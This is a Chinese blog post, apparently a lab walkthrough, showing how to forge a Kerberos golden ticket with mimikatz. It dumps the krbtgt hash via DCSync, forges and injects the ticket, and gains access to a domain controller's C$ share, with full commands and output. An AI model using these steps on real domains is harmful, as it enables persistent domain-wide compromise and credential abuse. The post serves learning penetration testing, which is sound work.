黄金票据制作

最新推荐文章于 2024-05-06 18:15:00 发布
最新推荐文章于 2024-05-06 18:15:00 发布
阅读量264 收藏 9
点赞数 3
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70613012/article/details/137267356
版权

1、黄金票据

    黄金票据在内网渗透中主要用于权限维持,即留下后门。使用黄金票据前提是你已经控制了整个域的域控制器。其核心原理与服务器中的krbtgt用户相关。从以下可以了解krbtgt原理:

前言 | windows protocolicon-default.png?t=N7T8https://daiker.gitbook.io/windows-protocol/2、制作黄金票据

2.1 靶场

    三个靶场的操作系统分别为Windows Server 2016、Windows 10和Windows 7。其中Windows Server 2016担任域控制器的角色,而Windows 10和Windows 7则作为域成员机。在域中有三个用户分别为:demo1、demo2和demo3。

2.2 拿到权限之后获取信息

2.3 获取域SID值

C:\Users\demo1\Desktop\mimikatz_trunk\x64>whoami /user

用户信息
----------------

用户名       SID
============ ============================================
peihua\demo1 S-1-5-21-1100783840-19582525-4266664591-500


500是权限数字,不是sid所以需要的值如下:
SID:S-1-5-21-1100783840-19582525-4266664591

2.4 获取域用户krbtgt密码hash值

使用mimiikztz工具获取hash值
执行privilege::debug进行权限提升
执行lsadump::dcsync /user:krbtgt /csv,返回结果如下:

mimikatz # lsadump::dcsync /user:krbtgt /csv
[DC] 'peihua.local' will be the domain
[DC] 'WIN-3TBP83C14B9.peihua.local' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  4d9ccdf4cd700017b5e6537ed6d59dc6  
514


得到hash值:4d9ccdf4cd700017b5e6537ed6d59dc6

2.5 制作票据

使用mimikatz中的kerberos::golden模块创建黄金票据,该票据的格式为.kirbi。制作出如下:
kerberos::golden /domain:peihua.local /sid:S-1-5-21-1100783840-19582525-4266664591 /krbtgt:4d9ccdf4cd700017b5e6537ed6d59dc6 /user:administrato

mimikatz # kerberos::golden /domain:peihua.local /sid:S-1-5-21-1100783840-19582525-4266664591 /krbtgt:4d9ccdf4cd700017b5e6537ed6d59dc6 /user:administrator
User      : administrator
Domain    : peihua.local (PEIHUA)
SID       : S-1-5-21-1100783840-19582525-4266664591
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 4d9ccdf4cd700017b5e6537ed6d59dc6 - rc4_hmac_nt
Lifetime  : 2024/3/31 16:04:20 ; 2034/3/29 16:04:20 ; 2034/3/29 16:04:20
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

3、验证

首先我们先登录一个域的普通账户,然后尝试通过dir访问域控的共享文件夹

C:\Users\demo1\Desktop\mimikatz_trunk\x64>dir \\WIN-3TBP83C14B9.peihua.local\c$
拒绝访问。

使用mimikatz将创建好的票据文件导入,然后尝试重新访问

kerberos::purge #清空已有票据
kerberos::ptt xxx.kiribi #导入票据
kerberos::list #查看票据
C:\Users\demo1\Desktop\mimikatz_trunk\x64>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # kerberos::ptt C:\Users\demo1\Desktop\mimikatz_trunk\x64\ticket.kirbi

* File: 'C:\Users\demo1\Desktop\mimikatz_trunk\x64\ticket.kirbi': OK

mimikatz # exit
Bye!

C:\Users\demo1\Desktop\mimikatz_trunk\x64>dir \\WIN-3TBP83C14B9.peihua.local\c$
 驱动器 \\WIN-3TBP83C14B9.peihua.local\c$ 中的卷没有标签。
 卷的序列号是 B4D7-21A5

 \\WIN-3TBP83C14B9.peihua.local\c$ 的目录

2016/07/16  21:23    <DIR>          PerfLogs
2016/12/14  19:06    <DIR>          Program Files
2016/07/16  21:23    <DIR>          Program Files (x86)
2024/03/28  21:20    <DIR>          Users
2024/03/28  22:34    <DIR>          Windows
               0 个文件              0 字 节
               5 个目录 51,617,316,864 可 用字节

C:\Users\demo1\Desktop\mimikatz_trunk\x64>

成功!

瓜子壳、
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
黄金票据原理制作与利用
G3et的博客
01-14 559
1、用域管理运行mimikatz抓取完所需的东西 ==> 再到域用户机器上运行伪造票据。2、krbtgt只存在域控上面,普通机器提权之类的无法获取到krbtgt的hash3、黄金票据可以获取任何Kerberos 服务权限,且由 krbtgt 的 hash 加密,黄金票据在使用的过程需要和域控通信****加粗样式。
票据培训20220120
01-20
票据培训20220120 票据培训是金融行业中的一门重要课程,旨在帮助学习者了解票据业务的基本概念、流程和操作。下面是票据培训的相关知识点: 1. 票据业务简介 票据业务是指银行或其他金融机构发放票据,以满足...
黄金票据制作-新手入门
weixin_42109829的博客
12-27 2319
0x01 前言 相信准备学习内网渗透的人,都会知道有黄金票据这个事情,而黄金票据的原理是和攻击方式,网站说的都一大堆概念,很难懂,这里我说声明一下,黄金票据的作用在于做权限维持 ,原理在于域服务器上有一个krbtgt用户 0x02 黄金票据和krbtgt 用户的关系 ​ Golden Ticket(下面称为金票)是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。可以说有了金票
内网渗透横向攻击流程
最新发布
qingkahui24689的博客
05-06 904
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
基于MSF框架下的kiwi模块制作黄金票据
weixin_60109175的博客
04-05 5486
目录 一、kiwi模块使用简介 1.权限问题 2.使用注意事项 3.关于kiwi的命令简介 二、实验过程 1.环境构成 2.实验步骤 三、黄金票据制作使用 1.制作票据的条件,以及如何获取该条件内容 2.制作黄金票据 3.黄金票据的使用 一、kiwi模块使用简介 1.权限问题 kiwi模块的使用需要域内管理员或者系统权限,如果是非管理员权限那么使用会受到很大的限制 2.使用注意事项 msf中的kiwi模块同时支持32位和64位操作系统,...
内网渗透之黄金票据制作
dragon的博客
04-02 1004
Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。在 Kerberos 认证中,最主要的问题是如何证明「你是你」的问题,如当一个 Client 去访问 Server 服务器上的某服务时,Server 如何判断 Client 是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是 Kerberos 解决的问题。
黄金票据制作原理及利用方式
Happy峰
09-23 2719
Golden Ticket黄金票据制作原理及利用方式 Krbtgt账户介绍 krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机 黄金票据原理 TGT=Krbtgt的html hash 加密 1、Kerberos中的TGT和Logon Session Key(CT_SK)是AS返回的 ,TGP它是由Krbtgt加密和签名的 ,krbtgt的NTLM Hash又是固定的,而CT_SK并不会保存在KDC中。 2、所以只要得到krbtgt
用excel制作票据打印模板的技巧.pdf
11-16
用excel制作票据打印模板的技巧.pdf
恒生票据综合管理系统解决方案
03-14
该解决方案涵盖了票据的整个生命周期管理,包括电子票据、实物票据票据池、票据理财、票据资管等模块。 业务解决方案: 恒生票据综合管理系统解决方案提供了多种业务解决方案,包括: * 票据业务解决方案:提供...
C#票据打印系统
12-29
《C#票据打印系统:深度解析与应用》 在信息技术高速发展的今天,各种软件系统扮演着日益重要的角色,其中C#票据打印系统以其强大的功能和灵活性,在商业运营、企业管理等领域得到了广泛应用。本篇文章将深入探讨C#...
票据打印控件
08-31
票据打印控件】是一种专门用于在计算机上生成和打印各种票据的专业软件组件。这种控件通常集成在应用程序中,可以方便地与数据库或其他数据源连接,以自定义格式显示和打印发票、收据、支票等金融文档。在本文中,...
3.4 Golden Ticket黄金票据制作原理及利用方式
GloryGod的博客
08-24 248
krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成的,无法登录主机。
windows权限维持—黄金白银票据&隐藏用户&远控&RustDesk&GotoHttp
剁椒鱼头没剁椒的博客
08-16 1794
总的来说隐藏用户目前的手段基本上服务器出现问题,第一件事都是查询隐藏用户,所以这个算是后门的一种方式,但是现在再来看已经不是那么好用了。这个工具存在一个问题就是有网络的情况下才能够使用,而在无网络的情况下是无法使用的,同时流量是走https协议,需要目标主机开放443端口。简单来说就是:有网络,无限制,可以使用。有网络,如果防火墙限制了443端口,无法使用。无网络,无限制,可以使用,但是可能需要转发,比较麻烦。无网络,有限制,基本上就是无法使用。
黄金票据的生成
m0_69801663的博客
12-19 984
黄金票据的生成
【域权限维持】-黄金票据
qq_41617902的博客
11-07 1283
Windows域权限维持-黄金票据
内网渗透--Golden Ticket(黄金票据制作&利用
qq_62169455的博客
01-17 1350
伪造TGT,不需要和KDC进行校验,金票可以直接在本地生成,在域内机器和非域内机器都可以使用。
黄金票据制作-新手向
m0_74834253的博客
03-31 705
最近,我学习了内网渗透的相关知识,其中包括了黄金票据的应用。黄金票据涉及的原理和攻击方法构成了一系列复杂的概念,晦涩难懂。简而言之,黄金票据在内网渗透中主要用于权限维持,即留下后门。使用黄金票据前提是你已经控制了整个域的域控制器。其核心原理与服务器中的krbtgt用户相关。如果想深入理解黄金票据的工作原理,需要进一步研究Kerberos协议。
[内网渗透]—票据传递
Sentiment的博客
12-08 783
之前我们在哈希传递篇就介绍到,要想使用mimikatz的哈希传递功能,就必须具有本地管理员的权限。但是在实际的渗透环境中,我们更多的是得到一个低权限的域账户而已。mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法,如票据传递(Pass The Ticket)。
黄金票据攻击
WE_zzs的博客
04-02 734
黄金票据(golden ticket)攻击,是一种为任意用户生成TGT票据的方法,属于一种后门。黄金票据生成,是生成有效的TGT Kerberos票据,并且不受TGT生命周期的影响(TGT默认10小时,最多续订7天),那么,这里可以为任意用户生成黄金票据,就可以为域管理员生成TGT,普通用户就可以变成域管理员。
内网中黄金票据和白银票据的区别
05-14
在内网中,黄金票据和白银票据通常是指两种不同的身份验证方式。 黄金票据是指一个用于身份验证的加密令牌,它被称为黄金是因为它具有最高的权限级别。黄金票据可以让用户在网络中获得管理员级别的访问权限,因此它的使用应该被高度限制并受到严格的监管。 白银票据则是一个用于身份验证的较低级别的加密令牌。它通常被用于授权用户在网络中执行一些普通的任务,例如打印文件或者访问共享文件夹。白银票据通常具有比黄金票据更低的访问权限,因此它的使用范围更广,可以被更多的用户所使用。 总的来说,黄金票据和白银票据都是用于身份验证的加密令牌,它们的主要区别在于权限级别的高低。在内网中,这些票据的使用应该受到高度的限制和监管,以确保网络的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值